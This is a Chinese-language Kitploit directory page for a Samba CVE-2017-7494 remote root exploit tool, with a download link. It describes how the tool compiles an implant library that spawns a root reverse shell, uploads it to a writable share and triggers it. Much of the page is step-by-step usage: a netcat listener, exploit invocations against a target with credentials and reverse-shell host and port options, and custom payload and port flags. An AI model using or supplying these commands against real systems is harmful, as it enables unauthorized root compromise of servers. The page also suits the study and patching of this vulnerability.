Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-7494 — 针对 SAMBA CVE-2017-7494 的远程 root 漏洞利用工具,可编译共享库 payload,将其上传到可写共享,并触发加载以生成 root 权限的反向 shell。 | Kitploit
工具/GitHubGitHub/sudlit/cve-2017-7494
Payload生成漏洞分析漏洞利用渗透测试远程访问工具
GitHubsudlit/cve-2017-7494

CVE-2017-7494

针对 SAMBA CVE-2017-7494 的远程 root 漏洞利用工具,可编译共享库 payload,将其上传到可写共享,并触发加载以生成 root 权限的反向 shell。

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-7494

针对SAMBA CVE-2017-7494漏洞的远程root利用工具。

详细信息

本利用工具分为两部分:

  • 首先,它编译一个名为"implant.c"的有效载荷,并生成一个库(libimplantx32.so或libimplantx64.so),该库切换为root用户,脱离父进程并派生一个反向Shell。
  • 其次,它在目标主机上查找可写共享,以上传该库(使用随机名称)并尝试加载它。

只要目标存在漏洞,且有效载荷与目标操作系统及架构匹配,该利用工具就100%可靠。

使用方法

在你的机器上运行以下命令:

root@kitploit:~
$ nc -p 31337 -l

然后,针对你的目标运行该利用工具,等待其连接回你的Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

如果你过快关闭反向Shell,无需重新运行利用工具上传模块等操作,你可以直接传递已上传模块的路径。假设它已上传到 /shared/directory/ 并命名为 "module.so",你可以运行类似下面的命令:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

更新于2017年11月25日 - Archivaldo

现在你可以针对samba 3.5.0和3.6.0版本运行该利用工具,只需添加参数 -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

你现在可以使用你自己的自定义.so文件

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

如果你需要在x86机器上运行此脚本,编译implant二进制文件将生成两个x86文件。使用标志 -n 1 可以禁用编译,并从另一台机器复制 libimplantx64.so。

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

如果samba仅在139端口运行,你可以使用参数 -p 设置远程服务器端口

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

备注

我不再支持它了。

-- Joxean Koret

下载工具